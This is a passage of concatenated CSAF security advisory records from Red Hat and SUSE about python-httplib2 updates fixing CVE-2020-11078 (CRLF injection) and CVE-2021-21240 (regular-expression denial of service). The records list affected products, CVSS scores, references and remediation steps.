"8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw was found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. 
In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode 
to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
rhsa-2021_2116
Vulnerability from csaf_redhat
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update for python-httplib2 is now available for Red Hat OpenStack\nPlatform 16.1 (Train).\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "A comprehensive HTTP client library that supports many features left out of other HTTP libraries.\n\nSecurity Fix(es):\n\n* CRLF injection via an attacker controlled unescaped part of uri for\nhttplib2.Http.request function (CVE-2020-11078)\n\n* Regular expression denial of service via malicious header\n(CVE-2021-21240)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2021:2116", url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_2116.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.6 (python-httplib2) security update", tracking: { current_release_date: "2024-11-22T16:41:45+00:00", generator: { date: "2024-11-22T16:41:45+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2021:2116", initial_release_date: "2021-05-26T11:48:28+00:00", revision_history: [ { date: "2021-05-26T11:48:28+00:00", number: "1", summary: "Initial version", }, { date: "2021-05-26T11:48:28+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T16:41:45+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat OpenStack Platform 16.1", product: { name: "Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1", product_identification_helper: { cpe: 
"cpe:/a:redhat:openstack:16.1::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenStack Platform", }, { branches: [ { category: "product_version", name: "python-httplib2-0:0.13.1-2.el8ost.src", product: { name: "python-httplib2-0:0.13.1-2.el8ost.src", product_id: "python-httplib2-0:0.13.1-2.el8ost.src", product_identification_helper: { purl: "pkg:rpm/redhat/python-httplib2@0.13.1-2.el8ost?arch=src", }, }, }, ], category: "architecture", name: "src", }, { branches: [ { category: "product_version", name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_id: "python3-httplib2-0:0.13.1-2.el8ost.noarch", product_identification_helper: { purl: "pkg:rpm/redhat/python3-httplib2@0.13.1-2.el8ost?arch=noarch", }, }, }, ], category: "architecture", name: "noarch", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0:0.13.1-2.el8ost.src as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", }, product_reference: "python-httplib2-0:0.13.1-2.el8ost.src", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0:0.13.1-2.el8ost.noarch as a component of Red Hat OpenStack Platform 16.1", product_id: "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", }, product_reference: "python3-httplib2-0:0.13.1-2.el8ost.noarch", relates_to_product_reference: "8Base-RHOS-CINDERLIB-16.1", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", cwe: { id: "CWE-113", name: "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')", }, discovery_date: "2020-05-20T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1845937", }, ], notes: [ { category: "description", text: "A flaw was found in 
python-httplib2. An attacker controlling an unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", title: "Vulnerability summary", }, { category: "other", text: "While Red Hat Quay 3.0, and 3.1 used the httplib2 library it was removed in versions 3.2 and later. Upgrade to 3.2 or later to fix this vulnerability in Red Hat Quay.\n\nRed Hat Gluster Storage 3 delivers the affected version of the python-httplib2 library. However the library is not used by Gluster hence the impact by this vulnerability is low.\n\nThis issue affects the version of the python-httplib2 library as shipped with Red Hat Ceph Storage (RHCS) version 2. 
Ceph-2 has reached End of Extended Life Cycle Support and is no longer fixing moderates/lows.\n\nThere's currently no known vector to exploit this when using Python versions with CVE-2019-9740 and CVE-2019-9947 fixed.\n\nIn Red Hat OpenStack Platform 13, because the flaw has a lower impact and the package's indirect usage in RHOSP cannot be exploited, no update will be provided at this time for the RHOSP python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "RHBZ#1845937", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1845937", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2020-11078", url: "https://www.cve.org/CVERecord?id=CVE-2020-11078", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", url: "https://nvd.nist.gov/vuln/detail/CVE-2020-11078", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq", }, ], release_date: "2020-05-20T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", 
"8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-httplib2: CRLF injection via an attacker controlled unescaped part of uri for httplib2.Http.request function", }, { cve: "CVE-2021-21240", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-02-09T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "1926885", }, ], notes: [ { category: "description", text: "An uncontrolled resource consumption flaw was found in python-httplib2, due to a flawed regular expression used while parsing the WWW-Authenticate header in an HTTP response. This flaw allows a malicious or compromised server to reply with a crafted sequence of characters in the WWW-Authenticate header, leading to a denial of service of the httplib2 client accessing the server. The highest threat from this vulnerability is to system availability.", title: "Vulnerability description", }, { category: "summary", text: "python-httplib2: Regular expression denial of service via malicious header", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a security impact of Low, because it requires a malicious or compromised server in order to be exploited, and it only affects the HTTP client. 
In Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP 13 python-httplib2 package.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "RHBZ#1926885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1926885", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-21240", url: "https://www.cve.org/CVERecord?id=CVE-2021-21240", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-21240", }, { category: "external", summary: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, ], release_date: "2021-01-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2021-05-26T11:48:28+00:00", details: "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2021:2116", }, { category: "workaround", details: "Use strict mode 
to parse WWW-Authenticate headers. This can be done by setting `httplib2.USE_WWW_AUTH_STRICT_PARSING = True`. Please note, however, that strict mode might lead to bad results in case of ill-formed header values.", product_ids: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOS-CINDERLIB-16.1:python-httplib2-0:0.13.1-2.el8ost.src", "8Base-RHOS-CINDERLIB-16.1:python3-httplib2-0:0.13.1-2.el8ost.noarch", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "python-httplib2: Regular expression denial of service via malicious header", }, ], }
suse-su-2021:1806-1
Vulnerability from csaf_suse
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 fixes the following issues:\n\n- Update to version 0.19.0 (bsc#1182053).\n- CVE-2021-21240: Fixed regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed unescaped part of uri where an attacker could change request headers and body (bsc#1182053).\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1806,SUSE-SLE-Module-Basesystem-15-SP2-2021-1806,SUSE-SLE-Module-Basesystem-15-SP3-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-1806,SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2021-1806", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1806-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1806-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211806-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1806-1", url: 
"https://lists.suse.com/pipermail/sle-security-updates/2021-May/008895.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-31T14:23:28Z", generator: { date: "2021-05-31T14:23:28Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1806-1", initial_release_date: "2021-05-31T14:23:28Z", revision_history: [ { date: "2021-05-31T14:23:28Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-3.3.1.noarch", product: { name: "python2-httplib2-0.19.0-3.3.1.noarch", product_id: "python2-httplib2-0.19.0-3.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-3.3.1.noarch", product: { name: "python3-httplib2-0.19.0-3.3.1.noarch", product_id: "python3-httplib2-0.19.0-3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product: { name: "SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3", 
product_identification_helper: { cpe: "cpe:/o:suse:sle-module-basesystem:15:sp3", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product: { name: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP2", product_identification_helper: { cpe: "cpe:/o:suse:packagehub:15:sp2", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product: { name: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:packagehub:15:sp3", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP2", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Basesystem 15 SP3", product_id: "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Basesystem 15 SP3", }, { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP2", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: 
"python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Package Hub 15 SP2", }, { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-3.3.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP3", product_id: "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-3.3.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Package Hub 15 SP3", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. 
This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:28Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE 
Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for 
Basesystem 15 SP2:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Basesystem 15 SP3:python3-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP2:python2-httplib2-0.19.0-3.3.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP3:python2-httplib2-0.19.0-3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:28Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1807-1
Vulnerability from csaf_suse
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon-security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- 
